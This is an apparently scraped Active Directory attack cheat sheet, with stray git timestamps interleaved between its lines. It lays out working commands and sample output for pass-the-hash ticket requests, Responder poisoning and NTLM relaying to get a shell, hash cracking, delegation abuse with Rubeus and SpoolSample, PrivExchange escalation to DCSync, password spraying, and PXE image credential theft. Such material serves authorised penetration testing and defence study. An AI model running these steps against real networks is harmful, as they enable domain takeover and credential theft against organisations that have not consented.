2018-08-12 21:30:22 +00:00
2018-05-08 20:11:36 +00:00
Request a TGT with only the NT hash
2018-08-12 21:30:22 +00:00
```powershell
2018-05-08 20:11:36 +00:00
Using impacket
./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
chmod 600 tgwynn.ccache
2018-08-12 21:30:22 +00:00
also with the AES Key if you have it
2018-05-08 20:11:36 +00:00
./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
klist
```
2018-05-05 15:32:19 +00:00
2018-12-25 19:41:43 +00:00
### Capturing and cracking NTLMv2 hashes
2018-12-25 19:35:39 +00:00
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR` , `MDNS` and `NETBIOS` requests on the network.
```python
python Responder.py -I eth0
```
Then crack the hash with `hashcat`
```powershell
hashcat -m 5600 -a 0 hash.txt crackstation.txt
```
2018-12-25 19:41:43 +00:00
### NTLMv2 hashes relaying
2018-12-25 19:35:39 +00:00
If a machine has `SMB signing` :`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off` .
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing` :`disabled`.
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
4. Wait for a shell
2018-05-05 15:32:19 +00:00
### Dangerous Built-in Groups Usage
2018-08-12 21:30:22 +00:00
2019-07-26 12:24:58 +00:00
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec
2018-05-05 15:32:19 +00:00
AdminSDHolder
2018-08-12 21:30:22 +00:00
2018-05-05 15:32:19 +00:00
```powershell
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
2018-08-12 21:30:22 +00:00
or
2018-05-05 15:32:19 +00:00
([adsisearcher]"(AdminCount=1)").findall()
```
2018-03-12 08:17:31 +00:00
2018-07-15 09:06:43 +00:00
### Trust relationship between domains
2018-08-12 21:30:22 +00:00
2018-07-15 09:06:43 +00:00
```powershell
nltest /trusted_domains
```
2018-08-12 21:30:22 +00:00
or
2018-07-15 09:06:43 +00:00
```powershell
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
SourceName TargetName TrustType TrustDirection
---------- ---------- --------- --------------
domainA.local domainB.local TreeRoot Bidirectional
```
2018-03-12 08:17:31 +00:00
2019-07-17 21:17:35 +00:00
### Unconstrained delegation
2019-07-27 11:02:16 +00:00
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’ s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
2019-07-17 21:17:35 +00:00
#### Find delegation
Check the `TrustedForDelegation` property.
```powershell
# From https://github.com/samratashok/ADModule
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
or
$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
grep TRUSTED_FOR_DELEGATION domain_computers.grep
```
NOTE: Domain controllers usually have unconstrained delegation enabled
#### Monitor with Rubeus
Monitor incoming connections from Rubeus.
```powershell
Rubeus.exe monitor /interval:1
```
#### Force a connect back from the DC
> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface
```powershell
# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
```
If the attack worked you should get a TGT of the domain controller.
#### Load the ticket
Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell
.\Rubeus.exe asktgs /ticket:< ticket base64 > /ptt
```
Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt`
### Resource-Based Constrained Delegation
2019-07-27 11:02:16 +00:00
Resource-based Constrained Delegation was introduced in Windows Server 2012.
> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
2019-07-22 19:45:50 +00:00
1. Import **Powermad** and **Powerview**
```powershell
PowerShell.exe -ExecutionPolicy Bypass
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
```
2. Get user SID
```powershell
$AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid
$ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID}
$ACE
ConvertFrom-SID $ACE.SecurityIdentifier
```
3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it
```powershell
New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force)
```
4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties
```powershell
$ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
$RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
```
5. Use Rubeus to get hash from password
```powershell
Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan
[*] Input password : Weakest123*
[*] Input username : swktest
[*] Input domain : factory.lan
[*] Salt : FACTORY.LANswktest
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
[*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498
[*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347
[*] des_cbc_md5 : BA297CFD07E62A5E
```
6. Impersonate domain admin using our newly created machine account
```powershell
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
[*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan':
doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD
AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE
LmZhY3RvcnkubGFu
[*] Action: Import Ticket
[+] Ticket successfully imported!
```
2019-07-17 21:17:35 +00:00
2019-02-10 18:51:54 +00:00
### PrivExchange attack
2019-07-24 12:10:58 +00:00
Exchange your privileges for Domain Admin privs by abusing Exchange.
:warning: You need a shell on a user account with a mailbox.
1. Exchange server hostname or IP address
```bash
pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
```
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
```powershell
ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username
```
3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
2019-02-10 18:51:54 +00:00
```bash
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
2019-07-24 12:10:58 +00:00
python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
2019-02-10 18:51:54 +00:00
# https://github.com/G0ldenGunSec/PowerPriv
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
```
2019-07-24 12:10:58 +00:00
4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
2019-02-10 18:51:54 +00:00
```bash
python secretsdump.py xxxxxxxxxx -just-dc
2019-07-24 12:10:58 +00:00
python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
```
5. Clean your mess and restore a previous state of the user's ACL
```powershell
python aclpwn.py --restore ../aclpwn-20190319-125741.restore
2019-02-10 18:51:54 +00:00
```
2019-02-26 16:24:10 +00:00
Alternatively you can use the Metasploit module
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription` ](https://github.com/rapid7/metasploit-framework/pull/11420 )
2019-03-24 12:16:23 +00:00
### Password spraying
2019-05-12 19:34:09 +00:00
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
2019-06-23 22:21:39 +00:00
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
2019-05-12 19:34:09 +00:00
Using `kerbrute` , a tool to perform Kerberos pre-auth bruteforcing.
2019-03-24 12:16:23 +00:00
```powershell
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
```
2019-05-12 19:34:09 +00:00
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
```powershell
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
```
2019-06-16 21:45:52 +00:00
Using [RDPassSpray ](https://github.com/xFreed0m/RDPassSpray ) to target RDP services.
```powershell
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
```
2019-07-01 21:29:29 +00:00
Using [hydra]() and [ncrack]() to target RDP services.
```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack – connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
2019-05-12 12:22:48 +00:00
Most of the time the best passwords to spray are :
- Password1
- Welcome1
- $Companyname1
2019-03-24 12:16:23 +00:00
2019-07-25 12:08:32 +00:00
### PXE Boot image attack
PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.
- Press ** [F8]** during the PXE boot to spawn an administrator console on the deployed machine.
- Press ** [SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry.
```powershell
net user hacker Password123! /add
net localgroup administrators /add hacker
```
- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe) ](https://github.com/wavestone-cdt/powerpxe ) and dig through it to find default passwords and domain accounts.
```powershell
# Import the module
PS > Import-Module .\PowerPXE.ps1
# Start the exploit on the Ethernet interface
PS > Get-PXEcreds -InterfaceAlias Ethernet
PS > Get-PXECreds -InterfaceAlias « lab 0 »
# Wait for the DHCP to get an address
>> Get a valid IP adress
>>> >>> DHCP proposal IP address: 192.168.22.101
>>> >>> DHCP Validation: DHCPACK
>>> >>> IP address configured: 192.168.22.101
# Extract BCD path from the DHCP response
>> Request BCD File path
>>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd
>>> >>> TFTP IP Address: 192.168.22.3
# Download the BCD file and extract wim files
>> Launch TFTP download
>>>> Transfer succeeded.
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
>> Launch TFTP download
>>>> Transfer succeeded.
# Parse wim files to find interesting data
>> Open LiteTouchPE_x86.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$
>>>> >>>> UserID = MdtService
>>>> >>>> UserPassword = Somepass1
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2019-07-25 12:08:32 +00:00
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema ](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin )
* [Abusing Kerberos: Kerberoasting - Haboob Team ](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf )
* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid ](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence )
* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling ](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/ )
2019-07-22 19:45:50 +00:00
* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x ](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ )
* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh ](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html )
2019-07-25 12:08:32 +00:00
* [BlueHat IL - Benjamin Delpy ](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf )
* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE )
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss ](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf )
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction ](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ )
* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin ](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/ )
2018-08-12 21:30:22 +00:00
* [Dumping Domain Password Hashes - Pentestlab ](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ )
2019-07-25 12:08:32 +00:00
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace ](https://zachgrace.com/posts/exploiting-ms14-068/ )
* [Exploiting PrivExchange - April 11, 2019 - @chryzsh ](https://chryzsh.github.io/exploiting-privexchange/ )
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019 ](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/ )
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences ](https://adsecurity.org/?p=2288 )
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments ](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments )
2018-08-12 21:30:22 +00:00
* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html )
* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html )
2019-07-25 12:08:32 +00:00
* [Golden ticket - Pentestlab ](https://pentestlab.blog/2018/04/09/golden-ticket/ )
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff ](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/ )
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018 ](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 )
* [Invoke-Kerberoast - Powersploit Read the docs ](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ )
* [Kerberoasting - Part 1 - Mubix “Rob” Fuller ](https://room362.com/post/2016/kerberoast-pt1/ )
* [Passing the hash with native RDP client (mstsc.exe) ](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/ )
2018-08-12 21:30:22 +00:00
* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView) ](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/ )
* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView ](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/ )
* [Pen Testing Active Directory Environments - Part III: Chasing Power Users ](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/ )
* [Pen Testing Active Directory Environments - Part IV: Graph Fun ](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/ )
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs ](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/ )
* [Pen Testing Active Directory Environments - Part VI: The Final Case ](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ )
2019-07-25 12:08:32 +00:00
* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec ](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/ )
* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec ](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ )
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman ](https://0metasecurity.com/post-oscp-part-2/ )
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith ](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/ )
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave ](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html )
* [Roasting AS-REPs - January 17, 2017 - harmj0y ](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ )
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher ](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa )
* [Using bloodhound to map the user network - Hausec ](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/ )
* [WHAT’ S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN ](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/ )
2018-08-12 21:30:22 +00:00
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1 ](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/ )
2019-07-24 12:10:58 +00:00
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami ](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html )
2019-07-26 12:24:58 +00:00
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y ](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/ )